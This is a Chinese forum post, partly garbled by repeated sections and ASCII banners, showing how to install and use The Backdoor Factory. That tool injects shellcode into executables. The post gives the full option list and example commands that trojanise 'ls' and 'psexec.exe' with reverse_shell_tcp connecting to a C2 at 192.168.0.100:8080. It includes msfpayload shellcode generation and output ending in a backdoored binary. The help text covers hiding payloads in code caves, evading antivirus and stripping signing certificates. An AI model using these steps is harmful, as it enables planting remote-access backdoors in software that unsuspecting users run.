参考:[url]https://github.com/secretsquirrel/the-backdoor-factory[/url]
貌似很有趣,值得深入了解了解 :wink:
[b]安装过程[/b]
[b]支持格式:[/b]
[quote]Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32),
and Mach-O x86/x64 and those formats in FAT files
Packed Files: PE UPX x86/x64
Experimental: OpenBSD x32 [/quote]
[b]使用[/b]
例子:
[quote]
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
[*] Checking file support
[*] System Type Supported: System V
[*] Gathering file info
[*] Getting shellcode length
[color=red]The following LinuxIntelELF32s are available:
reverse_shell_tcp
reverse_tcp_stager
user_supplied_shellcode
[!] Could not set shell[/color]
[/quote]
[quote]
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -s reverse_shell_tcp -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
[*] Checking file support
[*] System Type Supported: System V
[*] Gathering file info
[*] Getting shellcode length
[color=red]Must provide port
[*] Setting selected shellcode
Must provide port
[*] Patching x86 Binary
[!] Patching Complete
File ls is in the 'backdoored' directory
[/color][/quote]
貌似很有趣,值得深入了解了解 :wink:
[b]安装过程[/b]
1. easy_install
wget "https://pypi.python.org/packages/source/e/ez_setup/ez_setup-0.9.tar.gz#md5=1ac53445a67bf68eb2676a72cc3f87f8" -O easy.tar.gz
tar vxf easy.tar.gz
cd ez_setup-0.9/
python ez_setup.py
2. 安装pip
wget 'https://pypi.python.org/packages/source/p/pip/pip-1.5.6.tar.gz#md5=01026f87978932060cc86c1dc527903e' -O pip.tar.gz
tar vxf pip.tar.gz
python setup.py install
3. 安装the-backdoor-factory
wget https://github.com/secretsquirrel/the-backdoor-factory/archive/master.zip
unzip master.zip
cd the-backdoor-factory-master/
./install.sh[b]支持格式:[/b]
[quote]Windows PE x86/x64,ELF x86/x64 (System V, FreeBSD, ARM Little Endian x32),
and Mach-O x86/x64 and those formats in FAT files
Packed Files: PE UPX x86/x64
Experimental: OpenBSD x32 [/quote]
[b]使用[/b]
root@kali:~/the-backdoor-factory-master# ./backdoor.py -h
Usage: backdoor.py [options]
Options:
-h, --help show this help message and exit
-f FILE, --file=FILE File to backdoor
-s SHELL, --shell=SHELL
Payloads that are available for use. Use 'show' to see
payloads.
-H HOST, --hostip=HOST
IP of the C2 for reverse connections.
-P PORT, --port=PORT The port to either connect back to for reverse shells
or to listen on for bind shells
-J, --cave_jumping Select this options if you want to use code cave
jumping to further hide your shellcode in the binary.
-a, --add_new_section
Mandating that a new section be added to the exe
(better success) but less av avoidance
-U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
User supplied shellcode, make sure that it matches the
architecture that you are targeting.
-c, --cave The cave flag will find code caves that can be used
for stashing shellcode. This will print to all the
code caves of a specific size.The -l flag can be use
with this setting.
-l SHELL_LEN, --shell_length=SHELL_LEN
For use with -c to help find code caves of different
sizes
-o OUTPUT, --output-file=OUTPUT
The backdoor output file
-n NSECTION, --section=NSECTION
New section name must be less than seven characters
-d DIR, --directory=DIR
This is the location of the files that you want to
backdoor. You can make a directory of file backdooring
faster by forcing the attaching of a codecave to the
exe by using the -a setting.
-w, --change_access This flag changes the section that houses the codecave
to RWE. Sometimes this is necessary. Enabled by
default. If disabled, the backdoor may fail.
-i, --injector This command turns the backdoor factory in a hunt and
shellcode inject type of mechinism. Edit the target
settings in the injector module.
-u SUFFIX, --suffix=SUFFIX
For use with injector, places a suffix on the original
file for easy recovery
-D, --delete_original
For use with injector module. This command deletes
the original file. Not for use in production systems.
*Author not responsible for stupid uses.*
-O DISK_OFFSET, --disk_offset=DISK_OFFSET
Starting point on disk offset, in bytes. Some authors
want to obfuscate their on disk offset to avoid
reverse engineering, if you find one of those files
use this flag, after you find the offset.
-S, --support_check To determine if the file is supported by BDF prior to
backdooring the file. For use by itself or with
verbose. This check happens automatically if the
backdooring is attempted.
-M, --cave-miner Future use, to help determine smallest shellcode
possible in a PE file
-q, --no_banner Kills the banner.
-v, --verbose For debug information output.
-T IMAGE_TYPE, --image-type=IMAGE_TYPE
ALL, x86, or x64 type binaries only. Default=ALL
-Z, --zero_cert Allows for the overwriting of the pointer to the PE
certificate table effectively removing the certificate
from the binary for all intents and purposes.
-R, --runas_admin Checks the PE binaries for 'requestedExecutionLevel
level="highestAvailable"'. If this string is included
in the binary, it must run as system/admin. Doing this
slows patching speed significantly.
-L, --patch_dll Use this setting if you DON'T want to patch DLLs.
Patches by default.
-F FAT_PRIORITY, --FAT_PRIORITY=FAT_PRIORITY
For MACH-O format. If fat file, focus on which arch to
patch. Default is x64. To force x86 use -F x86, to
force both archs use -F ALL.
例子:
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp ./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a./backdoor.py -d test/ -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -amsfpayload windows/exec CMD='calc.exe' R > calc.bin
./backdoor.py -f ls -s user_supplied_shellcode -U calc.bin
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
./backdoor.py -i -H 192.168.0.100 -P 8080 -s reverse_shell_tcp -a -u .moocowwow [quote]
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
[*] Checking file support
[*] System Type Supported: System V
[*] Gathering file info
[*] Getting shellcode length
[color=red]The following LinuxIntelELF32s are available:
reverse_shell_tcp
reverse_tcp_stager
user_supplied_shellcode
[!] Could not set shell[/color]
[/quote]
[quote]
root@kali:~/the-backdoor-factory-master# ./backdoor.py -f ls -s reverse_shell_tcp -U calc.bin
-.(`-') (`-') _ <-.(`-') _(`-') (`-')
__( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO )
'-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,)
| .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. '
| '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' |
| /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .'
| '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \
`------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--'
(`-') _ (`-') (`-')
<-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .->
(`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-.
(OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' /
/ | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ /
\_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /)
`| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /`
`--' `--' `--' `-----' `--' `-----' `--' '--' `--'
Author: Joshua Pitts
Email: the.midnite.runr[a t]gmail<d o t>com
Twitter: @midnite_runr
2.3.1
[*] Checking file support
[*] System Type Supported: System V
[*] Gathering file info
[*] Getting shellcode length
[color=red]Must provide port
[*] Setting selected shellcode
Must provide port
[*] Patching x86 Binary
[!] Patching Complete
File ls is in the 'backdoored' directory
[/color][/quote]
3348
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
